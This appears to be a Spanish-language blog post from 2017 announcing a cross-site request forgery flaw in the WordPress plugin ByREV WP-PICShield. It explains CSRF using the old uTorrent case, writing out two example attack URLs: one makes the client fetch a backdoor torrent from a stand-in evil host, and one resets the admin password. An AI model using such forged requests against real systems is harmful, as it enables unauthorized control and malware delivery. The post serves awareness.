jueves, 23 de febrero de 2017

WORDPRESS - REV WP-PICShield WordPress plugin is vulnerable to CSRF - 0day 23-02-17



WORDPRESS - ByREV WP-PICShield - Cross-Site Request Forgery 
0day 23-02-17


 Buenos días VIETNAM  y hoy empezamos el día de trabajo anunciando un nuevo bug de WORDPRESS, bueno amigos no es un bug de WORDPRESS si no de un PLUGIN que se instala en el pero que al fin y al cabo afecta a este CMS ya que tiene una vulnerabilidad del tipo:

VULNERABILIDAD:   Cross-Site Request Forgery


Pero que podemos hacer con este ataque?

Es una falsificación de las solicitudes cruzadas, también conocida como ataque con un solo clic  abreviada como CSRF o XSRF, es un tipo técnica de hacking maliciosa donde se transmiten comandos no autorizados de un usuario y que el sitio web ve como confiables a diferencia de los scripts entre sitios (XSS), que explotan la confianza que un usuario tiene para un sitio en particular, CSRF explota la confianza que tiene un sitio en el navegador de un usuario.

Ejemplos de CSRF

Los hackerś pueden buscar y encontrar un link o enlace reproducible que ejecuta una acción específica en la página de destino, mientras la víctima está conectada allí pueden incrustar tal enlace en una página que controlan y engañar a la víctima para que la abra. 

El enlace del portador de ataque puede colocarse en un lugar que la víctima pueda visitar mientras esté conectado al sitio de destino (por ejemplo, un foro de discusión) o enviado en un  correo electrónico HTML o en un archivo adjunto.
 


Hace ya un tiempo un BUG real de CSRF en uTorrent con la clave internacional de vulnerabilidades (CVE-2008-6586) explotó el hecho de que su consola web accesible en localhost: 8080 permitió ejecutar acciones de misión crítica como una simple solicitud GET:


Con la cual forzaron a que un archivo .torrent se descargara con esta instrucción:

     Http: // localhost: 8080 / gui /? Action = add-url & s = http: //evil.example.com/backdoor.torrent


Cambiar la contraseña de administrador de uTorrent
     Http: // localhost: 8080 / gui /? Action = setsetting & s = webui.password & v = eviladmin
 



COmo pueden ver amigos este tipo de vulnerabilidad encontrado es peligrosa, por eos aigos debemos de tener cuidado.

UN saludo

LI. Rodolfo H. Baz.
www-rodolfohbaz.net
  


No hay comentarios:

Publicar un comentario

Crowdstrike -> Solución de errores de actualización de CrowdStrike con BitLocker habilitado

En este pequeño articulo ver como componer el problema de CROWDSTRIKE cuando esta habilitado el BITLOCKER, cabe resaltar que puede ser una e...